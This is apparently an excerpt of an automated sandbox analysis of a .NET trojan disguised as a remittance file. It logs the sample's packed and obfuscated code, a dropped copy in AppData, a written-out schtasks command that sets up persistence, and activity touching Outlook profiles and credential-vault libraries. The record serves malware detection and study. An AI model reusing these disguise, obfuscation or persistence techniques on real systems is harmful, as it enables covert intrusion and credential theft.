            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\winver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: winver.pdb source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494386152.00000000009F8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000000.2259718718.0000000000F0E000.00000002.00000001.01000000.0000000E.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000012.00000002.4493691348.0000000000F0E000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: wntdll.pdbUGP source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2334615268.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.000000000504E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2332306459.0000000004B46000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2334615268.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.000000000504E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2332306459.0000000004B46000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4495476148.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: winver.pdbGCTL source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, 00000009.00000002.2332718421.0000000001307000.00000004.00000020.00020000.00000000.sdmp, vFRZZQiLgeOQDzGymvZVa.exe, 00000010.00000002.4494386152.00000000009F8000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
            Source: GRogNEHvcL.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
            Source: GRogNEHvcL.exe.0.dr, Form1.cs.Net Code: InitializeComponent contains xor as well as GetObject
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.cs.Net Code: J9VHEH5Tcb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, pEl1BokNiGulhgUCNc.cs.Net Code: J9VHEH5Tcb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6ab0000.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, pEl1BokNiGulhgUCNc.cs.Net Code: J9VHEH5Tcb System.Reflection.Assembly.Load(byte[])
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.2854940.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 0_2_00E3F110 pushad ; iretd 0_2_00E3F111
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0041E803 push edi; retf 9_2_0041E80F
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_004238D3 push esp; ret 9_2_004238E2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0041C8AD push ss; retf 9_2_0041C8AE
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0040CCE3 push FFFFFFB0h; iretd 9_2_0040CCEB
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_00423F33 push 00000030h; retf 9_2_00423FB4
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_00407FD2 push edi; retf 9_2_00407FD3
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_00402FF0 push eax; ret 9_2_00402FF2
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0176225F pushad ; ret 9_2_017627F9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017627FA pushad ; ret 9_2_017627F9
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_017909AD push ecx; mov dword ptr [esp], ecx9_2_017909B6
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeCode function: 9_2_0176283D push eax; iretd 9_2_01762858
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_0119F110 pushad ; iretd 10_2_0119F111
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 10_2_0119F113 push esp; iretd 10_2_0119F119
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A7C54D pushfd ; ret 14_2_01A7C54E
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A309AD push ecx; mov dword ptr [esp], ecx14_2_01A309B6
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A7C9D7 push edi; ret 14_2_01A7C9D9
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A01366 push eax; iretd 14_2_01A01369
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A01FEC push eax; iretd 14_2_01A01FED
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeCode function: 14_2_01A87E99 push ecx; ret 14_2_01A87EAC
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exeStatic PE information: section name: .text entropy: 7.971455070226271
            Source: GRogNEHvcL.exe.0.drStatic PE information: section name: .text entropy: 7.971455070226271
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, vgVMeh5ONaAkPMui60.csHigh entropy of concatenated method names: 'CiYOmFhZPy', 'hfjOt71JUw', 'lrfpxrLEd6', 'Nyppbgggcm', 'f82p2ygIlJ', 'zUVpG3P57B', 'RNnpL1ecPj', 'Kgbp3KkdyX', 'y2UpTk1cYB', 'oCPpYyQBem'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, S19G3ec6CaHZBvv4Er.csHigh entropy of concatenated method names: 'HP0J5MSKAa', 'iZBJPJKnCT', 'ToString', 'omWJgPZKmf', 'qb7JaT5QXc', 'UjQJptWTuL', 'iExJOo5GDX', 'CYvJjn0Rjl', 'Io8JX5iiuf', 'HLUJwoEfQV'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, BubSUn4g8lttOexA3X.csHigh entropy of concatenated method names: 'mJKr0w3Qx5', 'gKPrieX2wS', 'pW6rQJPqTe', 'owqrZuqjpB', 'v8trbpneg0', 'drUr2GKMYJ', 'muQrLb0yEd', 'g2xr3OWVxG', 'pTUrYhYHyZ', 'tnUrFrxD3B'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, vf1bhSdHHYJ8A9DRaw.csHigh entropy of concatenated method names: 'hr6XB658pa', 'FJTXRdkH8p', 'WXmXEpw358', 'CHZX6t58h3', 'm4jXmSHboT', 'SjoXDauvQC', 'ooYXtrLMaJ', 'Rw9X0Ys6h1', 'EGiXiWkUst', 'O1XXnFZlfe'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, Yuj46yNx4rpAlmUpiQ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'g04oM621eY', 'kqIoVyEBID', 's8pozHY3eo', 'FrkUcQ1ovf', 'kjnU4TfZtu', 'VVMUorpr9a', 'QJwUUeTPp6', 'utHicIGe2BKMn5lc8wX'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, U6C8XXUv0ve2kcHMmO.csHigh entropy of concatenated method names: 'Sy0jNRmqgh', 'cjmjaaI1jR', 'aTJjOK8TGa', 'qpOjXCGLjM', 'pIejwuebhY', 'eP8OWLlphc', 'fH9Osv4rYI', 'yWpOldfvMe', 'eTGOyOaZsx', 'BNJOMyJoZ7'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, mQ0VywCHpDCHBFas9G.csHigh entropy of concatenated method names: 'taaeQB1t9n', 'rOveZxtDVs', 'iBqexIso1f', 'uW1eboJbGL', 'ABQe8Wb4JL', 'WKse2jIYk4', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, dn8oJO8aicYPFuG3q7.csHigh entropy of concatenated method names: 'Sk5E7neIX', 'f5O6sZTnw', 'RwcDtjhnM', 'yNNtH2BGU', 'xiJicV9HV', 'x6DnX28FQ', 'kEMqgeJNTRYVvUlyfv', 'fnLSrl7AMgVNQj5FsB', 'svieKKdYP', 'KUkCI5KgH'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, vjrmrlWAG0dDAaMj2h.csHigh entropy of concatenated method names: 'Tva4XGCVq4', 'zsk4wX6IMD', 'BXJ45ZSyu7', 'lfA4PVd6N7', 'PWK4ASlOAH', 'CmL49NXIiM', 'D3aV20xIGENewBviV4', 'Wo6qCOYCmCdPoyO5DW', 'r9u44QDUXA', 'NUy4UDVEZW'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, i8egbkjFJP5F3RxotWg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sCyC8elkiF', 'U2UC1slHBX', 'xaACq6u8lH', 'QVPCdxoiXp', 'OtPCW3hSIS', 'IpLCsXcl6Q', 'snmCl0VEXf'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, zAgZHnjqnqblC13b4yB.csHigh entropy of concatenated method names: 'kcC7BswgDc', 'qeL7RfN8Ad', 'wR27ExLBk7', 'FK6762VMaC', 'CHS7mZq97P', 'N2D7DFUDT3', 'oxT7tp2a5Q', 'voD70fmrOd', 'JkT7iX9lHO', 'CE57nulydM'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, t2aK0SX3teb8FBFlWg.csHigh entropy of concatenated method names: 'e1fAYqLvvP', 'yYrAfyQLxo', 'dCoA81Ock3', 'aKUA18X0CQ', 'nyqAZNiEfq', 'P1jAxsm4Fq', 'z4eAbsO44W', 'kxoA2VhkZw', 'MI7AGoQuvx', 'dAsALtuhxO'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, eQDLlF0mF1BvPPtfCH.csHigh entropy of concatenated method names: 'kmla84c746', 'QR1a1hg6uX', 'ppCaqUTmLL', 'lnTadtaIP1', 'VpNaWe2qrr', 'v02ass96CK', 'f9PallIfPA', 'XKDayn3J4c', 'JXvaMuOAxK', 'YC3aVMM6lQ'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, py6OwdfHhY9vOuqCQL.csHigh entropy of concatenated method names: 'zTK74H0Igw', 'RJ27UhXr6O', 'H047H12k6M', 'VYB7g8Cack', 'xub7aDP7sl', 'asf7OToeLU', 'SbA7jIQjaB', 'LXdelkcZX8', 'znPeynlVua', 'SjeeMyi4pv'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, puU2W8ZrfZp4OhD3Tm.csHigh entropy of concatenated method names: 'glnegZiU9F', 'lIreaHqBFt', 'DapepisYH2', 'QKeeOVGvEb', 'RErejAp8ow', 'TVreXUM6R9', 'ph1ewDAuRw', 'gnFehjVXuZ', 'VZYe5ZdIEa', 'R38ePJMuMC'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.csHigh entropy of concatenated method names: 'wvmUNG8C41', 'zOrUgkpbcZ', 'XneUafup1B', 'M5kUprhwVN', 'JBXUOyl878', 'EUUUj2yB8r', 'Mm3UXigEYX', 'f5MUwMCl5u', 'hl9UheluYP', 'zxwU5wigv8'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, MqXGgssMO1Fekyy8Ue.csHigh entropy of concatenated method names: 'TSoJyTLen1', 'lgbJVeDXFN', 'r1iecATgq5', 'qOie4XXRlF', 'wZVJF0IPsr', 'sdGJfWtTNs', 'p23JuH8SZF', 'OjJJ8XCibU', 'lMLJ1eetI5', 'h1EJq8RMN9'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, E3nYVuzF8BiBFLgvyG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LQT7r2dnq3', 'MjR7A2xZBg', 'Qye79xagac', 'FJq7Jdbx1W', 'YDH7e0xVPV', 'W5177skZLG', 'l3A7CWSwgT'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, IPTiVEoD9SEW2ijISU.csHigh entropy of concatenated method names: 'Dispose', 'ChZ4MxIRQj', 'HRHoZc5HZc', 'hN5SSi3RkW', 'fLC4VIxQXO', 'RW24zN5igM', 'ProcessDialogKey', 'PMfocoCnSX', 'Nn6o44coWa', 'C2xooLoImE'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, d87gQCndHkNhNRfkD8.csHigh entropy of concatenated method names: 'Uo9p6EZbMd', 'vEBpDiZjQt', 'kYNp0camaQ', 'IH3piCD1us', 'vHRpAmfeNI', 'KGfp9YKpmn', 'jZWpJydEOw', 'dfTpe5DyIE', 'yUYp7Kv9n4', 'l9IpCAK4Qo'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, ITbjRnelAIyF0LCEDn.csHigh entropy of concatenated method names: 'ToString', 'Swo9Fyalwy', 'cQe9ZBrC6T', 'Eyq9xSLpBO', 'ONw9bnfjfb', 'JM392r75J4', 'p1x9GMYM0q', 'cXb9LvfVZM', 'tUc93PMfTK', 'pv09TuZCNC'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, qXhj9uT83Th3DKXxfu.csHigh entropy of concatenated method names: 'tUWXgYJ8XR', 'T7IXpbMfvQ', 'f2iXjU1sG2', 'EHfjV1B8DC', 'jLWjztE4WA', 'spVXcnndem', 'lLwX4aRuAr', 'YR4Xo27Pyq', 'vJZXUFrrd8', 'fx4XHvcPX6'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, d87gQCndHkNhNRfkD8.csHigh entropy of concatenated method names: 'Uo9p6EZbMd', 'vEBpDiZjQt', 'kYNp0camaQ', 'IH3piCD1us', 'vHRpAmfeNI', 'KGfp9YKpmn', 'jZWpJydEOw', 'dfTpe5DyIE', 'yUYp7Kv9n4', 'l9IpCAK4Qo'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, ITbjRnelAIyF0LCEDn.csHigh entropy of concatenated method names: 'ToString', 'Swo9Fyalwy', 'cQe9ZBrC6T', 'Eyq9xSLpBO', 'ONw9bnfjfb', 'JM392r75J4', 'p1x9GMYM0q', 'cXb9LvfVZM', 'tUc93PMfTK', 'pv09TuZCNC'
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, qXhj9uT83Th3DKXxfu.csHigh entropy of concatenated method names: 'tUWXgYJ8XR', 'T7IXpbMfvQ', 'f2iXjU1sG2', 'EHfjV1B8DC', 'jLWjztE4WA', 'spVXcnndem', 'lLwX4aRuAr', 'YR4Xo27Pyq', 'vJZXUFrrd8', 'fx4XHvcPX6'
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; File created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe

            Boot Survival

            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
